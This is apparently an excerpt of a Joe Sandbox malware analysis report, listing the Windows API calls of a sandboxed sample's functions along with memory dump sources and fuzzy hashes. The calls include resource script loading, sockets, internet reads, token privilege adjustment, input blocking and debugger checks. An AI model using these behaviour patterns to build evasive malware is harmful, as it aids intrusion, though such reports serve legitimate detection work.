                                                                                                                                                                                                                                                                                                                            • API String ID: 929743424-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8ebd69e359856684200f1f16f3d64ff7197752aceafa9b167d7300c7445d6b4e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ce00ad2d4d98b9622a5ef1660d5df590183448fea37c2024d7c54b856cf9ce9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ebd69e359856684200f1f16f3d64ff7197752aceafa9b167d7300c7445d6b4e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A811AB0124404BEE62DAA3C4C98EBF159EFB7A310B16011BF112D67D5CB798FD29276
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002156C2,?,?,00000000,00000000), ref: 00243A1E
                                                                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002156C2,?,?,00000000,00000000), ref: 00243A35
                                                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE), ref: 00243A45
                                                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE), ref: 00243A56
                                                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(002156C2,?,?,002156C2,?,?,00000000,00000000,?,?,?,?,?,?,001D66CE,?), ref: 00243A65
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00231916
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00231922
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00231931
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00231938
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023194E
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00231C81), ref: 002320FB
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00232107
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0023210E
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00232127
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00231C81), ref: 0023213B
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00232142
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0024A5BD
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0024A6D0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002442B9: GetInputState.USER32 ref: 00244310
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002442B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002443AB
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0024A5ED
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0024A6BA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: _wcslen.LIBCMT ref: 00253AF8
                                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002522BA
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 002522E1
                                                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00252338
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00252343
                                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00252372
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0024D8CE
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0024D92F
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0024D943
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,002146AC), ref: 0023E482
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0023E491
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023E4A2
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023E4AE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00202A8A
                                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00202A94
                                                                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00202AA1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001F09D8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001F09F5
                                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023205A
                                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00232087
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00232097
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5079
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5080
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 001F5092
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0022E664
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a21c9cb0664e48df9b68249449db1a87248170489f4c61ac3f44701601a5b76f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 380b3b29553d27b51f151c2cc2265f2b138138b367a05fc9c7178d5dc96b351a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a21c9cb0664e48df9b68249449db1a87248170489f4c61ac3f44701601a5b76f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D0C9B481112DFACF80CB90EC88DDD73BCBB04304F114651F106E2040D77095489F10
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244229
                                                                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244239
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6595df7d5b1e8b1b7b747ccac53119649406c55792ee1b4c0de4b173eb0ae3a0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 05e5ec9343cf19f18cf55a23fcbe356fa09dabe8dc0ad09dc806c478e04b79cd
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6595df7d5b1e8b1b7b747ccac53119649406c55792ee1b4c0de4b173eb0ae3a0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF0E5307102296AE7206676AC4DFEB766DEFC5761F000176F905D2281DAF09944C6B0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00231B48), ref: 00231A20
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00231B48), ref: 00231A35
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 02a00237f76779ba5cee880a2b5ac526307830a0750ed95822454b1fab62f5d2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f6d2fb7ca3ebd35a6a27ce129449dc2c4219cb0ef97642170d22c3b38d3454f0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02a00237f76779ba5cee880a2b5ac526307830a0750ed95822454b1fab62f5d2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE04F72018615AFE7262B11FC09F7277E9EB08311F24881DF59580471DBA2ACA0DB10
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0024F51A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 97063eb006a2e186cadb9cfb5ce152a1487a5cc64ed729f3148526da515f7c07
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef877aaf93693e894a96bc51b2986ba8eda6b706f647b306dff5e253eff2b9c7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97063eb006a2e186cadb9cfb5ce152a1487a5cc64ed729f3148526da515f7c07
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE048316102059FC754AF69E504957F7DCAFA4761F008426F849C7351D7B0F940CBD1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0023EC95
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
